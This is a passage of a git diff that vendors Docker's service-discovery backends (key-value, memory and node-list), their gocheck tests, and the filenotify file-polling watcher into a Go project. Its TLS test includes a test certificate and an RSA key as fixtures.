Discovery is exported +type Discovery struct { + backend store.Backend + store store.Store + heartbeat time.Duration + ttl time.Duration + prefix string + path string +} + +func init() { + Init() +} + +// Init is exported +func Init() { + // Register to libkv + zookeeper.Register() + consul.Register() + etcd.Register() + + // Register to internal discovery service + discovery.Register("zk", &Discovery{backend: store.ZK}) + discovery.Register("consul", &Discovery{backend: store.CONSUL}) + discovery.Register("etcd", &Discovery{backend: store.ETCD}) +} + +// Initialize is exported +func (s *Discovery) Initialize(uris string, heartbeat time.Duration, ttl time.Duration, clusterOpts map[string]string) error { + var ( + parts = strings.SplitN(uris, "/", 2) + addrs = strings.Split(parts[0], ",") + err error + ) + + // A custom prefix to the path can be optionally used. + if len(parts) == 2 { + s.prefix = parts[1] + } + + s.heartbeat = heartbeat + s.ttl = ttl + + // Use a custom path if specified in discovery options + dpath := defaultDiscoveryPath + if clusterOpts["kv.path"] != "" { + dpath = clusterOpts["kv.path"] + } + + s.path = path.Join(s.prefix, dpath) + + var config *store.Config + if clusterOpts["kv.cacertfile"] != "" && clusterOpts["kv.certfile"] != "" && clusterOpts["kv.keyfile"] != "" { + logrus.Info("Initializing discovery with TLS") + tlsConfig, err := tlsconfig.Client(tlsconfig.Options{ + CAFile: clusterOpts["kv.cacertfile"], + CertFile: clusterOpts["kv.certfile"], + KeyFile: clusterOpts["kv.keyfile"], + }) + if err != nil { + return err + } + config = &store.Config{ + // Set ClientTLS to trigger https (bug in libkv/etcd) + ClientTLS: &store.ClientTLSConfig{ + CACertFile: clusterOpts["kv.cacertfile"], + CertFile: clusterOpts["kv.certfile"], + KeyFile: clusterOpts["kv.keyfile"], + }, + // The actual TLS config that will be used + TLS: tlsConfig, + } + } else { + logrus.Info("Initializing discovery without TLS") + } + + // Creates a new store, will ignore options given + // if not supported by the chosen store + s.store, err = libkv.NewStore(s.backend, addrs, config) + return err +} + +// Watch the store until either there's a store error or we receive a stop request. +// Returns false if we shouldn't attempt watching the store anymore (stop request received). +func (s *Discovery) watchOnce(stopCh <-chan struct{}, watchCh <-chan []*store.KVPair, discoveryCh chan discovery.Entries, errCh chan error) bool { + for { + select { + case pairs := <-watchCh: + if pairs == nil { + return true + } + + logrus.WithField("discovery", s.backend).Debugf("Watch triggered with %d nodes", len(pairs)) + + // Convert `KVPair` into `discovery.Entry`. + addrs := make([]string, len(pairs)) + for _, pair := range pairs { + addrs = append(addrs, string(pair.Value)) + } + + entries, err := discovery.CreateEntries(addrs) + if err != nil { + errCh <- err + } else { + discoveryCh <- entries + } + case <-stopCh: + // We were requested to stop watching. + return false + } + } +} + +// Watch is exported +func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) { + ch := make(chan discovery.Entries) + errCh := make(chan error) + + go func() { + defer close(ch) + defer close(errCh) + + // Forever: Create a store watch, watch until we get an error and then try again. + // Will only stop if we receive a stopCh request. + for { + // Create the path to watch if it does not exist yet + exists, err := s.store.Exists(s.path) + if err != nil { + errCh <- err + } + if !exists { + if err := s.store.Put(s.path, []byte(""), &store.WriteOptions{IsDir: true}); err != nil { + errCh <- err + } + } + + // Set up a watch. + watchCh, err := s.store.WatchTree(s.path, stopCh) + if err != nil { + errCh <- err + } else { + if !s.watchOnce(stopCh, watchCh, ch, errCh) { + return + } + } + + // If we get here it means the store watch channel was closed. This + // is unexpected so let's retry later. + errCh <- fmt.Errorf("Unexpected watch error") + time.Sleep(s.heartbeat) + } + }() + return ch, errCh +} + +// Register is exported +func (s *Discovery) Register(addr string) error { + opts := &store.WriteOptions{TTL: s.ttl} + return s.store.Put(path.Join(s.path, addr), []byte(addr), opts) +} + +// Store returns the underlying store used by KV discovery. +func (s *Discovery) Store() store.Store { + return s.store +} + +// Prefix returns the store prefix +func (s *Discovery) Prefix() string { + return s.prefix +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go new file mode 100644 index 0000000000..dab3939dd0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go @@ -0,0 +1,324 @@ +package kv + +import ( + "errors" + "io/ioutil" + "os" + "path" + "testing" + "time" + + "github.com/docker/docker/pkg/discovery" + "github.com/docker/libkv" + "github.com/docker/libkv/store" + + "github.com/go-check/check" +) + +// Hook up gocheck into the "go test" runner. +func Test(t *testing.T) { check.TestingT(t) } + +type DiscoverySuite struct{} + +var _ = check.Suite(&DiscoverySuite{}) + +func (ds *DiscoverySuite) TestInitialize(c *check.C) { + storeMock := &FakeStore{ + Endpoints: []string{"127.0.0.1"}, + } + d := &Discovery{backend: store.CONSUL} + d.Initialize("127.0.0.1", 0, 0, nil) + d.store = storeMock + + s := d.store.(*FakeStore) + c.Assert(s.Endpoints, check.HasLen, 1) + c.Assert(s.Endpoints[0], check.Equals, "127.0.0.1") + c.Assert(d.path, check.Equals, defaultDiscoveryPath) + + storeMock = &FakeStore{ + Endpoints: []string{"127.0.0.1:1234"}, + } + d = &Discovery{backend: store.CONSUL} + d.Initialize("127.0.0.1:1234/path", 0, 0, nil) + d.store = storeMock + + s = d.store.(*FakeStore) + c.Assert(s.Endpoints, check.HasLen, 1) + c.Assert(s.Endpoints[0], check.Equals, "127.0.0.1:1234") + c.Assert(d.path, check.Equals, "path/"+defaultDiscoveryPath) + + storeMock = &FakeStore{ + Endpoints: []string{"127.0.0.1:1234", "127.0.0.2:1234", "127.0.0.3:1234"}, + } + d = &Discovery{backend: store.CONSUL} + d.Initialize("127.0.0.1:1234,127.0.0.2:1234,127.0.0.3:1234/path", 0, 0, nil) + d.store = storeMock + + s = d.store.(*FakeStore) + c.Assert(s.Endpoints, check.HasLen, 3) + c.Assert(s.Endpoints[0], check.Equals, "127.0.0.1:1234") + c.Assert(s.Endpoints[1], check.Equals, "127.0.0.2:1234") + c.Assert(s.Endpoints[2], check.Equals, "127.0.0.3:1234") + + c.Assert(d.path, check.Equals, "path/"+defaultDiscoveryPath) +} + +// Extremely limited mock store so we can test initialization +type Mock struct { + // Endpoints passed to InitializeMock + Endpoints []string + + // Options passed to InitializeMock + Options *store.Config +} + +func NewMock(endpoints []string, options *store.Config) (store.Store, error) { + s := &Mock{} + s.Endpoints = endpoints + s.Options = options + return s, nil +} +func (s *Mock) Put(key string, value []byte, opts *store.WriteOptions) error { + return errors.New("Put not supported") +} +func (s *Mock) Get(key string) (*store.KVPair, error) { + return nil, errors.New("Get not supported") +} +func (s *Mock) Delete(key string) error { + return errors.New("Delete not supported") +} + +// Exists mock +func (s *Mock) Exists(key string) (bool, error) { + return false, errors.New("Exists not supported") +} + +// Watch mock +func (s *Mock) Watch(key string, stopCh <-chan struct{}) (<-chan *store.KVPair, error) { + return nil, errors.New("Watch not supported") +} + +// WatchTree mock +func (s *Mock) WatchTree(prefix string, stopCh <-chan struct{}) (<-chan []*store.KVPair, error) { + return nil, errors.New("WatchTree not supported") +} + +// NewLock mock +func (s *Mock) NewLock(key string, options *store.LockOptions) (store.Locker, error) { + return nil, errors.New("NewLock not supported") +} + +// List mock +func (s *Mock) List(prefix string) ([]*store.KVPair, error) { + return nil, errors.New("List not supported") +} + +// DeleteTree mock +func (s *Mock) DeleteTree(prefix string) error { + return errors.New("DeleteTree not supported") +} + +// AtomicPut mock +func (s *Mock) AtomicPut(key string, value []byte, previous *store.KVPair, opts *store.WriteOptions) (bool, *store.KVPair, error) { + return false, nil, errors.New("AtomicPut not supported") +} + +// AtomicDelete mock +func (s *Mock) AtomicDelete(key string, previous *store.KVPair) (bool, error) { + return false, errors.New("AtomicDelete not supported") +} + +// Close mock +func (s *Mock) Close() { + return +} + +func (ds *DiscoverySuite) TestInitializeWithCerts(c *check.C) { + cert := `-----BEGIN CERTIFICATE----- +MIIDCDCCAfKgAwIBAgIICifG7YeiQOEwCwYJKoZIhvcNAQELMBIxEDAOBgNVBAMT +B1Rlc3QgQ0EwHhcNMTUxMDAxMjMwMDAwWhcNMjAwOTI5MjMwMDAwWjASMRAwDgYD +VQQDEwdUZXN0IENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1wRC +O+flnLTK5ImjTurNRHwSejuqGbc4CAvpB0hS+z0QlSs4+zE9h80aC4hz+6caRpds ++J908Q+RvAittMHbpc7VjbZP72G6fiXk7yPPl6C10HhRSoSi3nY+B7F2E8cuz14q +V2e+ejhWhSrBb/keyXpcyjoW1BOAAJ2TIclRRkICSCZrpXUyXxAvzXfpFXo1RhSb +UywN11pfiCQzDUN7sPww9UzFHuAHZHoyfTr27XnJYVUerVYrCPq8vqfn//01qz55 +Xs0hvzGdlTFXhuabFtQnKFH5SNwo/fcznhB7rePOwHojxOpXTBepUCIJLbtNnWFT +V44t9gh5IqIWtoBReQIDAQABo2YwZDAOBgNVHQ8BAf8EBAMCAAYwEgYDVR0TAQH/ +BAgwBgEB/wIBAjAdBgNVHQ4EFgQUZKUI8IIjIww7X/6hvwggQK4bD24wHwYDVR0j +BBgwFoAUZKUI8IIjIww7X/6hvwggQK4bD24wCwYJKoZIhvcNAQELA4IBAQDES2cz +7sCQfDCxCIWH7X8kpi/JWExzUyQEJ0rBzN1m3/x8ySRxtXyGekimBqQwQdFqlwMI +xzAQKkh3ue8tNSzRbwqMSyH14N1KrSxYS9e9szJHfUasoTpQGPmDmGIoRJuq1h6M +ej5x1SCJ7GWCR6xEXKUIE9OftXm9TdFzWa7Ja3OHz/mXteii8VXDuZ5ACq6EE5bY +8sP4gcICfJ5fTrpTlk9FIqEWWQrCGa5wk95PGEj+GJpNogjXQ97wVoo/Y3p1brEn +t5zjN9PAq4H1fuCMdNNA+p1DHNwd+ELTxcMAnb2ajwHvV6lKPXutrTFc4umJToBX +FpTxDmJHEV4bzUzh +-----END CERTIFICATE----- +` + key := `-----BEGIN RSA PRIVATE KEY----- +MIIEpQIBAAKCAQEA1wRCO+flnLTK5ImjTurNRHwSejuqGbc4CAvpB0hS+z0QlSs4 ++zE9h80aC4hz+6caRpds+J908Q+RvAittMHbpc7VjbZP72G6fiXk7yPPl6C10HhR +SoSi3nY+B7F2E8cuz14qV2e+ejhWhSrBb/keyXpcyjoW1BOAAJ2TIclRRkICSCZr +pXUyXxAvzXfpFXo1RhSbUywN11pfiCQzDUN7sPww9UzFHuAHZHoyfTr27XnJYVUe +rVYrCPq8vqfn//01qz55Xs0hvzGdlTFXhuabFtQnKFH5SNwo/fcznhB7rePOwHoj +xOpXTBepUCIJLbtNnWFTV44t9gh5IqIWtoBReQIDAQABAoIBAHSWipORGp/uKFXj +i/mut776x8ofsAxhnLBARQr93ID+i49W8H7EJGkOfaDjTICYC1dbpGrri61qk8sx +qX7p3v/5NzKwOIfEpirgwVIqSNYe/ncbxnhxkx6tXtUtFKmEx40JskvSpSYAhmmO +1XSx0E/PWaEN/nLgX/f1eWJIlxlQkk3QeqL+FGbCXI48DEtlJ9+MzMu4pAwZTpj5 +5qtXo5JJ0jRGfJVPAOznRsYqv864AhMdMIWguzk6EGnbaCWwPcfcn+h9a5LMdony +MDHfBS7bb5tkF3+AfnVY3IBMVx7YlsD9eAyajlgiKu4zLbwTRHjXgShy+4Oussz0 +ugNGnkECgYEA/hi+McrZC8C4gg6XqK8+9joD8tnyDZDz88BQB7CZqABUSwvjDqlP +L8hcwo/lzvjBNYGkqaFPUICGWKjeCtd8pPS2DCVXxDQX4aHF1vUur0uYNncJiV3N +XQz4Iemsa6wnKf6M67b5vMXICw7dw0HZCdIHD1hnhdtDz0uVpeevLZ8CgYEA2KCT +Y43lorjrbCgMqtlefkr3GJA9dey+hTzCiWEOOqn9RqGoEGUday0sKhiLofOgmN2B +LEukpKIey8s+Q/cb6lReajDVPDsMweX8i7hz3Wa4Ugp4Xa5BpHqu8qIAE2JUZ7bU +t88aQAYE58pUF+/Lq1QzAQdrjjzQBx6SrBxieecCgYEAvukoPZEC8mmiN1VvbTX+ +QFHmlZha3QaDxChB+QUe7bMRojEUL/fVnzkTOLuVFqSfxevaI/km9n0ac5KtAchV +xjp2bTnBb5EUQFqjopYktWA+xO07JRJtMfSEmjZPbbay1kKC7rdTfBm961EIHaRj +xZUf6M+rOE8964oGrdgdLlECgYEA046GQmx6fh7/82FtdZDRQp9tj3SWQUtSiQZc +qhO59Lq8mjUXz+MgBuJXxkiwXRpzlbaFB0Bca1fUoYw8o915SrDYf/Zu2OKGQ/qa +V81sgiVmDuEgycR7YOlbX6OsVUHrUlpwhY3hgfMe6UtkMvhBvHF/WhroBEIJm1pV +PXZ/CbMCgYEApNWVktFBjOaYfY6SNn4iSts1jgsQbbpglg3kT7PLKjCAhI6lNsbk +dyT7ut01PL6RaW4SeQWtrJIVQaM6vF3pprMKqlc5XihOGAmVqH7rQx9rtQB5TicL +BFrwkQE4HQtQBV60hYQUzzlSk44VFDz+jxIEtacRHaomDRh2FtOTz+I= +-----END RSA PRIVATE KEY----- +` + certFile, err := ioutil.TempFile("", "cert") + c.Assert(err, check.IsNil) + defer os.Remove(certFile.Name()) + certFile.Write([]byte(cert)) + certFile.Close() + keyFile, err := ioutil.TempFile("", "key") + c.Assert(err, check.IsNil) + defer os.Remove(keyFile.Name()) + keyFile.Write([]byte(key)) + keyFile.Close() + + libkv.AddStore("mock", NewMock) + d := &Discovery{backend: "mock"} + err = d.Initialize("127.0.0.3:1234", 0, 0, map[string]string{ + "kv.cacertfile": certFile.Name(), + "kv.certfile": certFile.Name(), + "kv.keyfile": keyFile.Name(), + }) + c.Assert(err, check.IsNil) + s := d.store.(*Mock) + c.Assert(s.Options.TLS, check.NotNil) + c.Assert(s.Options.TLS.RootCAs, check.NotNil) + c.Assert(s.Options.TLS.Certificates, check.HasLen, 1) +} + +func (ds *DiscoverySuite) TestWatch(c *check.C) { + mockCh := make(chan []*store.KVPair) + + storeMock := &FakeStore{ + Endpoints: []string{"127.0.0.1:1234"}, + mockKVChan: mockCh, + } + + d := &Discovery{backend: store.CONSUL} + d.Initialize("127.0.0.1:1234/path", 0, 0, nil) + d.store = storeMock + + expected := discovery.Entries{ + &discovery.Entry{Host: "1.1.1.1", Port: "1111"}, + &discovery.Entry{Host: "2.2.2.2", Port: "2222"}, + } + kvs := []*store.KVPair{ + {Key: path.Join("path", defaultDiscoveryPath, "1.1.1.1"), Value: []byte("1.1.1.1:1111")}, + {Key: path.Join("path", defaultDiscoveryPath, "2.2.2.2"), Value: []byte("2.2.2.2:2222")}, + } + + stopCh := make(chan struct{}) + ch, errCh := d.Watch(stopCh) + + // It should fire an error since the first WatchTree call failed. + c.Assert(<-errCh, check.ErrorMatches, "test error") + // We have to drain the error channel otherwise Watch will get stuck. + go func() { + for range errCh { + } + }() + + // Push the entries into the store channel and make sure discovery emits. + mockCh <- kvs + c.Assert(<-ch, check.DeepEquals, expected) + + // Add a new entry. + expected = append(expected, &discovery.Entry{Host: "3.3.3.3", Port: "3333"}) + kvs = append(kvs, &store.KVPair{Key: path.Join("path", defaultDiscoveryPath, "3.3.3.3"), Value: []byte("3.3.3.3:3333")}) + mockCh <- kvs + c.Assert(<-ch, check.DeepEquals, expected) + + close(mockCh) + // Give it enough time to call WatchTree. + time.Sleep(3 * time.Second) + + // Stop and make sure it closes all channels. + close(stopCh) + c.Assert(<-ch, check.IsNil) + c.Assert(<-errCh, check.IsNil) +} + +// FakeStore implements store.Store methods. It mocks all store +// function in a simple, naive way. +type FakeStore struct { + Endpoints []string + Options *store.Config + mockKVChan <-chan []*store.KVPair + + watchTreeCallCount int +} + +func (s *FakeStore) Put(key string, value []byte, options *store.WriteOptions) error { + return nil +} + +func (s *FakeStore) Get(key string) (*store.KVPair, error) { + return nil, nil +} + +func (s *FakeStore) Delete(key string) error { + return nil +} + +func (s *FakeStore) Exists(key string) (bool, error) { + return true, nil +} + +func (s *FakeStore) Watch(key string, stopCh <-chan struct{}) (<-chan *store.KVPair, error) { + return nil, nil +} + +// WatchTree will fail the first time, and return the mockKVchan afterwards. +// This is the behavior we need for testing.. If we need 'moar', should update this. +func (s *FakeStore) WatchTree(directory string, stopCh <-chan struct{}) (<-chan []*store.KVPair, error) { + if s.watchTreeCallCount == 0 { + s.watchTreeCallCount = 1 + return nil, errors.New("test error") + } + // First calls error + return s.mockKVChan, nil +} + +func (s *FakeStore) NewLock(key string, options *store.LockOptions) (store.Locker, error) { + return nil, nil +} + +func (s *FakeStore) List(directory string) ([]*store.KVPair, error) { + return []*store.KVPair{}, nil +} + +func (s *FakeStore) DeleteTree(directory string) error { + return nil +} + +func (s *FakeStore) AtomicPut(key string, value []byte, previous *store.KVPair, options *store.WriteOptions) (bool, *store.KVPair, error) { + return true, nil, nil +} + +func (s *FakeStore) AtomicDelete(key string, previous *store.KVPair) (bool, error) { + return true, nil +} + +func (s *FakeStore) Close() { +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go new file mode 100644 index 0000000000..ba8b1f55f3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go @@ -0,0 +1,93 @@ +package memory + +import ( + "sync" + "time" + + "github.com/docker/docker/pkg/discovery" +) + +// Discovery implements a discovery backend that keeps +// data in memory. +type Discovery struct { + heartbeat time.Duration + values []string + mu sync.Mutex +} + +func init() { + Init() +} + +// Init registers the memory backend on demand. +func Init() { + discovery.Register("memory", &Discovery{}) +} + +// Initialize sets the heartbeat for the memory backend. +func (s *Discovery) Initialize(_ string, heartbeat time.Duration, _ time.Duration, _ map[string]string) error { + s.heartbeat = heartbeat + s.values = make([]string, 0) + return nil +} + +// Watch sends periodic discovery updates to a channel. +func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) { + ch := make(chan discovery.Entries) + errCh := make(chan error) + ticker := time.NewTicker(s.heartbeat) + + go func() { + defer close(errCh) + defer close(ch) + + // Send the initial entries if available. + var currentEntries discovery.Entries + var err error + + s.mu.Lock() + if len(s.values) > 0 { + currentEntries, err = discovery.CreateEntries(s.values) + } + s.mu.Unlock() + + if err != nil { + errCh <- err + } else if currentEntries != nil { + ch <- currentEntries + } + + // Periodically send updates. + for { + select { + case <-ticker.C: + s.mu.Lock() + newEntries, err := discovery.CreateEntries(s.values) + s.mu.Unlock() + if err != nil { + errCh <- err + continue + } + + // Check if the file has really changed. + if !newEntries.Equals(currentEntries) { + ch <- newEntries + } + currentEntries = newEntries + case <-stopCh: + ticker.Stop() + return + } + } + }() + + return ch, errCh +} + +// Register adds a new address to the discovery. +func (s *Discovery) Register(addr string) error { + s.mu.Lock() + s.values = append(s.values, addr) + s.mu.Unlock() + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go new file mode 100644 index 0000000000..c2da0a068e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go @@ -0,0 +1,48 @@ +package memory + +import ( + "testing" + + "github.com/docker/docker/pkg/discovery" + "github.com/go-check/check" +) + +// Hook up gocheck into the "go test" runner. +func Test(t *testing.T) { check.TestingT(t) } + +type discoverySuite struct{} + +var _ = check.Suite(&discoverySuite{}) + +func (s *discoverySuite) TestWatch(c *check.C) { + d := &Discovery{} + d.Initialize("foo", 1000, 0, nil) + stopCh := make(chan struct{}) + ch, errCh := d.Watch(stopCh) + + // We have to drain the error channel otherwise Watch will get stuck. + go func() { + for range errCh { + } + }() + + expected := discovery.Entries{ + &discovery.Entry{Host: "1.1.1.1", Port: "1111"}, + } + + c.Assert(d.Register("1.1.1.1:1111"), check.IsNil) + c.Assert(<-ch, check.DeepEquals, expected) + + expected = discovery.Entries{ + &discovery.Entry{Host: "1.1.1.1", Port: "1111"}, + &discovery.Entry{Host: "2.2.2.2", Port: "2222"}, + } + + c.Assert(d.Register("2.2.2.2:2222"), check.IsNil) + c.Assert(<-ch, check.DeepEquals, expected) + + // Stop and make sure it closes all channels. + close(stopCh) + c.Assert(<-ch, check.IsNil) + c.Assert(<-errCh, check.IsNil) +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go new file mode 100644 index 0000000000..c0e3c07b22 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go @@ -0,0 +1,54 @@ +package nodes + +import ( + "fmt" + "strings" + "time" + + "github.com/docker/docker/pkg/discovery" +) + +// Discovery is exported +type Discovery struct { + entries discovery.Entries +} + +func init() { + Init() +} + +// Init is exported +func Init() { + discovery.Register("nodes", &Discovery{}) +} + +// Initialize is exported +func (s *Discovery) Initialize(uris string, _ time.Duration, _ time.Duration, _ map[string]string) error { + for _, input := range strings.Split(uris, ",") { + for _, ip := range discovery.Generate(input) { + entry, err := discovery.NewEntry(ip) + if err != nil { + return fmt.Errorf("%s, please check you are using the correct discovery (missing token:// ?)", err.Error()) + } + s.entries = append(s.entries, entry) + } + } + + return nil +} + +// Watch is exported +func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) { + ch := make(chan discovery.Entries) + go func() { + defer close(ch) + ch <- s.entries + <-stopCh + }() + return ch, nil +} + +// Register is exported +func (s *Discovery) Register(addr string) error { + return discovery.ErrNotImplemented +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go new file mode 100644 index 0000000000..e26568cf54 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go @@ -0,0 +1,51 @@ +package nodes + +import ( + "testing" + + "github.com/docker/docker/pkg/discovery" + + "github.com/go-check/check" +) + +// Hook up gocheck into the "go test" runner. +func Test(t *testing.T) { check.TestingT(t) } + +type DiscoverySuite struct{} + +var _ = check.Suite(&DiscoverySuite{}) + +func (s *DiscoverySuite) TestInitialize(c *check.C) { + d := &Discovery{} + d.Initialize("1.1.1.1:1111,2.2.2.2:2222", 0, 0, nil) + c.Assert(len(d.entries), check.Equals, 2) + c.Assert(d.entries[0].String(), check.Equals, "1.1.1.1:1111") + c.Assert(d.entries[1].String(), check.Equals, "2.2.2.2:2222") +} + +func (s *DiscoverySuite) TestInitializeWithPattern(c *check.C) { + d := &Discovery{} + d.Initialize("1.1.1.[1:2]:1111,2.2.2.[2:4]:2222", 0, 0, nil) + c.Assert(len(d.entries), check.Equals, 5) + c.Assert(d.entries[0].String(), check.Equals, "1.1.1.1:1111") + c.Assert(d.entries[1].String(), check.Equals, "1.1.1.2:1111") + c.Assert(d.entries[2].String(), check.Equals, "2.2.2.2:2222") + c.Assert(d.entries[3].String(), check.Equals, "2.2.2.3:2222") + c.Assert(d.entries[4].String(), check.Equals, "2.2.2.4:2222") +} + +func (s *DiscoverySuite) TestWatch(c *check.C) { + d := &Discovery{} + d.Initialize("1.1.1.1:1111,2.2.2.2:2222", 0, 0, nil) + expected := discovery.Entries{ + &discovery.Entry{Host: "1.1.1.1", Port: "1111"}, + &discovery.Entry{Host: "2.2.2.2", Port: "2222"}, + } + ch, _ := d.Watch(nil) + c.Assert(expected.Equals(<-ch), check.Equals, true) +} + +func (s *DiscoverySuite) TestRegister(c *check.C) { + d := &Discovery{} + c.Assert(d.Register("0.0.0.0"), check.NotNil) +} diff --git a/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go new file mode 100644 index 0000000000..7a81cbda95 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go @@ -0,0 +1,40 @@ +// Package filenotify provides a mechanism for watching file(s) for changes. +// Generally leans on fsnotify, but provides a poll-based notifier which fsnotify does not support. +// These are wrapped up in a common interface so that either can be used interchangeably in your code. +package filenotify + +import "github.com/fsnotify/fsnotify" + +// FileWatcher is an interface for implementing file notification watchers +type FileWatcher interface { + Events() <-chan fsnotify.Event + Errors() <-chan error + Add(name string) error + Remove(name string) error + Close() error +} + +// New tries to use an fs-event watcher, and falls back to the poller if there is an error +func New() (FileWatcher, error) { + if watcher, err := NewEventWatcher(); err == nil { + return watcher, nil + } + return NewPollingWatcher(), nil +} + +// NewPollingWatcher returns a poll-based file watcher +func NewPollingWatcher() FileWatcher { + return &filePoller{ + events: make(chan fsnotify.Event), + errors: make(chan error), + } +} + +// NewEventWatcher returns an fs-event based file watcher +func NewEventWatcher() (FileWatcher, error) { + watcher, err := fsnotify.NewWatcher() + if err != nil { + return nil, err + } + return &fsNotifyWatcher{watcher}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go new file mode 100644 index 0000000000..5d08a997a0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go @@ -0,0 +1,18 @@ +package filenotify + +import "github.com/fsnotify/fsnotify" + +// fsNotifyWatcher wraps the fsnotify package to satisfy the FileNotifer interface +type fsNotifyWatcher struct { + *fsnotify.Watcher +} + +// Events returns the fsnotify event channel receiver +func (w *fsNotifyWatcher) Events() <-chan fsnotify.Event { + return w.Watcher.Events +} + +// Errors returns the fsnotify error channel receiver +func (w *fsNotifyWatcher) Errors() <-chan error { + return w.Watcher.Errors +} diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller.go b/vendor/github.com/docker/docker/pkg/filenotify/poller.go new file mode 100644 index 0000000000..dc5ccd0f7f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/filenotify/poller.go @@ -0,0 +1,204 @@ +package filenotify + +import ( + "errors" + "fmt" + "os" + "sync" + "time" + + "github.com/Sirupsen/logrus" + + "github.com/fsnotify/fsnotify" +) + +var ( + // errPollerClosed is returned when the poller is closed + errPollerClosed = errors.New("poller is closed") + // errNoSuchPoller is returned when trying to remove a watch that doesn't exist + errNoSuchWatch = errors.New("poller does not exist") +) + +// watchWaitTime is the time to wait between file poll loops +const watchWaitTime = 200 * time.Millisecond + +// filePoller is used to poll files for changes, especially in cases where fsnotify +// can't be run (e.g. when inotify handles are exhausted) +// filePoller satisfies the FileWatcher interface +type filePoller struct { + // watches is the list of files currently being polled, close the associated channel to stop the watch + watches map[string]chan struct{} + // events is the channel to listen to for watch events + events chan fsnotify.Event + // errors is the channel to listen to for watch errors + errors chan error + // mu locks the poller for modification + mu sync.Mutex + // closed is used to specify when the poller has already closed + closed bool +} + +// Add adds a filename to the list of watches +// once added the file is polled for changes in a separate goroutine +func (w *filePoller) Add(name string) error { + w.mu.Lock() + defer w.mu.Unlock() + + if w.closed == true { + return errPollerClosed + } + + f, err := os.Open(name) + if err != nil { + return err + } + fi, err := os.Stat(name) + if err != nil { + return err + } + + if w.watches == nil { + w.watches = make(map[string]chan struct{}) + } + if _, exists := w.watches[name]; exists { + return fmt.Errorf("watch exists") + } + chClose := make(chan struct{}) + w.watches[name] = chClose + + go w.watch(f, fi, chClose) + return nil +} + +// Remove stops and removes watch with the specified name +func (w *filePoller) Remove(name string) error { + w.mu.Lock() + defer w.mu.Unlock() + return w.remove(name) +} + +func (w *filePoller) remove(name string) error { + if w.closed == true { + return errPollerClosed + } + + chClose, exists := w.watches[name] + if !exists { + return errNoSuchWatch + } + close(chClose) + delete(w.watches, name) + return nil +} + +// Events returns the event channel +// This is used for notifications on events about watched files +func (w *filePoller) Events() <-chan fsnotify.Event { + return w.events +} + +// Errors returns the errors channel +// This is used for notifications about errors on watched files +func (w *filePoller) Errors() <-chan error { + return w.errors +} + +// Close closes the poller +// All watches are stopped, removed, and the poller cannot be added to +func (w *filePoller) Close() error { + w.mu.Lock() + defer w.mu.Unlock() + + if w.closed { + return nil + } + + w.closed = true + for name := range w.watches { + w.remove(name) + delete(w.watches, name) + } + return nil +} + +// sendEvent publishes the specified event to the events channel +func (w *filePoller) sendEvent(e fsnotify.Event, chClose <-chan struct{}) error { + select { + case w.events <- e: + case <-chClose: + return fmt.Errorf("closed") + } + return nil +} + +// sendErr publishes the specified error to the errors channel +func (w *filePoller) sendErr(e error, chClose <-chan struct{}) error { + select { + case w.errors <- e: + case <-chClose: + return fmt.Errorf("closed") + } + return nil +} + +// watch is responsible for polling the specified file for changes +// upon finding changes to a file or errors, sendEvent/sendErr is called +func (w *filePoller) watch(f *os.File, lastFi os.FileInfo, chClose chan struct{}) { + defer f.Close() + for { + time.Sleep(watchWaitTime) + select { + case <-chClose: + logrus.Debugf("watch for %s closed", f.Name()) + return + default: + } + + fi, err := os.Stat(f.Name()) + if err != nil { + // if we got an error here and lastFi is not set, we can presume that nothing has changed + // This should be safe since before `watch()` is called, a stat is performed, there is any error `watch` is not called + if lastFi == nil { + continue + } + // If it doesn't exist at this point, it must have been removed + // no need to send the error here since this is a valid operation + if os.IsNotExist(err) { + if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Remove, Name: f.Name()}, chClose); err != nil { + return + } + lastFi = nil + continue + } + // at this point, send the error + if err := w.sendErr(err, chClose); err != nil { + return + } + continue + } + + if lastFi == nil { + if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Create, Name: fi.Name()}, chClose); err != nil { + return + } + lastFi = fi + continue + } + + if fi.Mode() != lastFi.Mode() { + if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Chmod, Name: fi.Name()}, chClose); err != nil { + return + } + lastFi = fi + continue + } + + if fi.ModTime() != lastFi.ModTime() || fi.Size() != lastFi.Size() { + if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Write, Name: fi.Name()}, chClose); err != nil { + return + } + lastFi = fi + continue + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go new file mode 100644 index 0000000000..b4c7825112 --- /dev/null +++ 